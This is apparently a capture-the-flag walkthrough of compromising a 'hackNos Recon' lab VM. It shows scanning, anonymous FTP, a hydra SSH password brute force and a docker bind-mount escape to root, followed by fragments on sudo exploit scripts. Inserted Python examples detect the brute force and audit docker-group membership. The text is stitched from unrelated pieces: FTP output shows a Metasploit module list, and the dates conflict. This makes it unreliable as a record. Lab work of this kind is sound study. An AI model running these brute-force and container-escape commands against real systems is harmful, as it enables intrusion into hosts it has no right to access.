└─# nmap -p- -sV -sT -T4 192.168.5.132
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-24 17:23 CST
Nmap scan report for 192.168.5.132
Host is up (0.0012s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
MAC Address: 00:0C:29:48:11:36 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.34 seconds
The text above reads: is requesting your username and password. The site says: “Recon Security”
Try anonymous FTP login
└─# ftp 192.168.5.132
Connected to 192.168.5.132.
220 "Security@hackNos".
Name (192.168.5.132:root): ftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
   #  Name                                                     Disclosure Date  Rank    Check  Description
   -  ----                                                     ---------------  ----    -----  -----------
   0  auxiliary/scanner/http/dlink_dir_300_615_http_login                       normal  No     D-Link DIR-300A / DIR-320 / DIR-615D HTTP Login Utility
   1  auxiliary/scanner/http/dlink_dir_session_cgi_http_login                   normal  No     D-Link DIR-300B / DIR-600B / DIR-815 / DIR-645 HTTP Login Utility
   2  auxiliary/scanner/http/dlink_dir_615h_http_login                          normal  No     D-Link DIR-615H HTTP Login Utility
   3  auxiliary/scanner/http/http_login                                         normal  No     HTTP Login Utility
   4  auxiliary/scanner/vmware/vmware_http_login                                normal  No     VMWare Web Login Scanner

Interact with a module by name or index. For example info 4, use 4 or use auxiliary/scanner/vmware/vmware_http_login
msf6 > use 3
msf6 auxiliary(scanner/http/http_login) > show options

   Name              Current Setting                                                           Required  Description
   ----              ---------------                                                           --------  -----------
   AUTH_URI                                                                                    no        The URI to authenticate against (default:auto)
   BLANK_PASSWORDS   false                                                                     no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                         yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                                     no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                     no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                     no        Add all users in the current database to the list
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   REQUESTTYPE       GET                                                                       no        Use HTTP-GET or HTTP-PUT for Digest-Auth, PROPFIND for WebDAV (default:GET)
   RHOSTS                                                                                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             80                                                                        yes       The target port (TCP)
   SSL               false                                                                     no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                                                                     yes       Stop guessing when a credential works for a host
   THREADS           1                                                                         yes       The number of concurrent threads (max one per host)
   USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/http_default_userpass.txt  no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                                     no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/wordlists/http_default_users.txt     no        File containing users, one per line
   VERBOSE           true                                                                      yes       Whether to print output for all attempts
   VHOST                                                                                       no        HTTP server virtual host
└─# hydra -l recon -P passrecon ssh://192.168.5.132
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-09-17 22:07:52
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:1/p:6), ~1 try per task
[DATA] attacking ssh://192.168.5.132:22/
[22][ssh] host: 192.168.5.132   login: recon   password: Security@hackNos
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-09-17 22:07:55
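From the defender's side, the hydra run above leaves a distinctive trace in sshd's auth.log: a burst of "Failed password" lines from one source, ended by an "Accepted password" line when the wordlist hits. The following detector is an added example, not part of the original writeup; the log lines, hostnames, source address and the 2021 year passed to parse_line are constructed for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample sshd auth.log lines (not from the page): five password
# failures and then a success from one source, six tries in all, the shape the
# hydra run above leaves behind, plus one unrelated key-based login.
SAMPLE_AUTH_LOG = """\
Sep 17 22:07:52 hacknos sshd[1201]: Failed password for recon from 192.168.5.100 port 51002 ssh2
Sep 17 22:07:52 hacknos sshd[1202]: Failed password for recon from 192.168.5.100 port 51004 ssh2
Sep 17 22:07:53 hacknos sshd[1203]: Failed password for recon from 192.168.5.100 port 51006 ssh2
Sep 17 22:07:53 hacknos sshd[1204]: Failed password for recon from 192.168.5.100 port 51008 ssh2
Sep 17 22:07:54 hacknos sshd[1205]: Failed password for recon from 192.168.5.100 port 51010 ssh2
Sep 17 22:07:55 hacknos sshd[1206]: Accepted password for recon from 192.168.5.100 port 51012 ssh2
Sep 17 22:30:01 hacknos sshd[1300]: Accepted publickey for deploy from 192.168.0.104 port 40000 ssh2
"""

# Syslog-style sshd line; "invalid user" appears when the login name does not exist.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) \w+ for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)

def parse_line(line, year=2021):
    # syslog timestamps carry no year, so the caller supplies it (assumed 2021 here)
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["src"]

def detect_bruteforce(log_text, threshold=5, window=timedelta(minutes=1)):
    """src -> alert once >= threshold failures fall inside `window`; an Accepted
    login from a flagged src afterwards marks the guessed-password case."""
    failures = defaultdict(list)
    alerts = {}
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        ts, result, user, src = ev
        if result == "Failed":
            recent = [t for t in failures[src] if ts - t <= window] + [ts]
            failures[src] = recent  # keep only failures inside the sliding window
            if len(recent) >= threshold:
                alerts[src] = {"user": user, "failures": len(recent), "success_followed": False}
        elif src in alerts:
            alerts[src]["success_followed"] = True
    return alerts
```

Tuning threshold and window to the host's normal login pattern matters: the hydra warning above already hints that SSH servers limit parallel sessions, so a real burst may be spread over a longer window than this one.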
└─# ssh recon@192.168.5.132
The authenticity of host '192.168.5.132 (192.168.5.132)' can't be established.
ECDSA key fingerprint is SHA256:YyrsJ6SfcrEjupojYvAzzhetfPVnVVv4XDFAoaf2FGw.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.5.132' (ECDSA) to the list of known hosts.
recon@192.168.5.132's password:
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-24-generic x86_64)

31 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable

Your Ubuntu release is not supported anymore.
For upgrade information, please visit:
http://www.ubuntu.com/releaseendoflife

New release '20.04.3 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Fri Jan 10 23:05:02 2020 from 192.168.0.104
recon@hacknos:~$ sudo -l
[sudo] password for recon:
Matching Defaults entries for recon on hacknos:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User recon may run the following commands on hacknos:
    (ALL : ALL) ALL
REPOSITORY   TAG       IMAGE ID   CREATED   SIZE
recon@hacknos:~$
recon@hacknos:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Unable to find image 'alpine:latest' locally
latest: Pulling from library/alpine
a0d0a0d46f8b: Pull complete
Digest: sha256:e1c082e3d3c45cccac829840a25941e679c25d438cc8412c2fa221cf1a824e6a
Status: Downloaded newer image for alpine:latest
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
#
# exit
recon@hacknos:~$ docker run -it -v /:/mbt e7d92cdc71fe
Unable to find image 'e7d92cdc71fe:latest' locally
docker: Error response from daemon: pull access denied for e7d92cdc71fe, repository does not exist or may require 'docker login': denied: requested access to the resource is denied.
See 'docker run --help'.
recon@hacknos:~$ docker iamges
docker: 'iamges' is not a docker command.
See 'docker --help'
recon@hacknos:~$ docker images
REPOSITORY   TAG       IMAGE ID       CREATED       SIZE
alpine       latest    14119a10abf4   2 weeks ago   5.6MB
recon@hacknos:~$ docker run -it -v /:/mbt 14119a10abf4
/ # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/ # ls
bin    dev    etc    home   lib    mbt    media  mnt    opt    proc   root   run    sbin   srv    sys    tmp    usr    var
/ # cd root/
~ # ls
~ # cd ..
/ # cd /mbt
/mbt # ls
bin    dev    initrd.img      lib32   lost+found  opt   run   srv  usr  vmlinuz.old
boot   etc    initrd.img.old  lib64   media       proc  sbin  sys  var
cdrom  home   lib             libx32  mnt         root  snap  tmp  vmlinuz
/mbt # cd root
/mbt/root # ls
root.txt  snap
/mbt/root # cat root
cat: can't open 'root': No such file or directory
/mbt/root # cat root.txt
[root.txt prints an ASCII-art banner]
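The session above shows why docker group membership is root-equivalent: the user is not root on the host, but dockerd is, and it happily bind-mounts / into a container. The audit below is an added example, not code from the writeup; it parses a constructed /etc/group excerpt (the gid values, the "ci" user and the mode bits in the docstring are assumptions for the demonstration) and reports which users the host's group file and docker socket permissions make root-equivalent.

```python
import stat

# Constructed /etc/group excerpt (not from the page); recon sits in both sudo
# and docker, which is exactly what the session above exploits.
SAMPLE_ETC_GROUP = """\
root:x:0:
adm:x:4:syslog,recon
sudo:x:27:recon
docker:x:998:recon,ci
lxd:x:130:ci
www-data:x:33:
"""

# Groups whose membership is root-equivalent on the host, and why.
ROOT_EQUIVALENT_GROUPS = {
    "docker": "docker run -v /:/mnt ... chroot /mnt gives a root shell on the host",
    "lxd": "a privileged container with the host disk attached does the same",
    "disk": "raw block-device access bypasses file permissions",
    "sudo": "sudo -l showed (ALL : ALL) ALL on this host",
}

def parse_etc_group(text):
    """Map group name -> (gid, set of supplementary members)."""
    groups = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 4 or line.startswith("#"):
            continue  # blank, comment or malformed line
        name, _pw, gid, members = fields
        groups[name] = (int(gid), {m for m in members.split(",") if m})
    return groups

def root_equivalent_users(text):
    """user -> sorted list of groups that make that user root-equivalent."""
    findings = {}
    for group, (_gid, members) in parse_etc_group(text).items():
        if group in ROOT_EQUIVALENT_GROUPS:
            for user in members:
                findings.setdefault(user, []).append(group)
    return {u: sorted(g) for u, g in findings.items()}

def socket_writers(text, st_mode, st_gid):
    """Who can write the docker socket given its mode bits and owning gid
    (on a live host pass os.stat('/var/run/docker.sock').st_mode / .st_gid;
    Ubuntu's default is srw-rw---- root:docker)."""
    if st_mode & stat.S_IWOTH:
        return {"*": "world-writable socket: every local user"}
    if st_mode & stat.S_IWGRP:
        for name, (gid, members) in parse_etc_group(text).items():
            if gid == st_gid:
                return {u: f"member of {name}" for u in sorted(members)}
    return {}
```

The fix on a host like this one is to remove non-admin users from docker (and lxd), keep the socket at 0660 root:docker, and treat docker group membership in change reviews exactly like a sudoers entry.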
Kernel version: 5.3.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 19.10
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
For Linux distributions whose glibc has no tcache support:
If the target is Debian 9, Ubuntu 16.04, or Ubuntu 14.04, try the exploit_nss_xxx.py for that specific version first. Next, try exploit_defaults_mailer.py; if you know the target sudo was compiled with --disable-root-mailer, you can skip this exploit. The exploit attempts to read the root mailer flag from the sudo binary, but on some Linux distributions the sudo binary's permissions are 4711 (-rws--x--x), which makes that check impossible on the target system (CentOS 6 and 7 are known cases). Last, try exploit_userspec.py.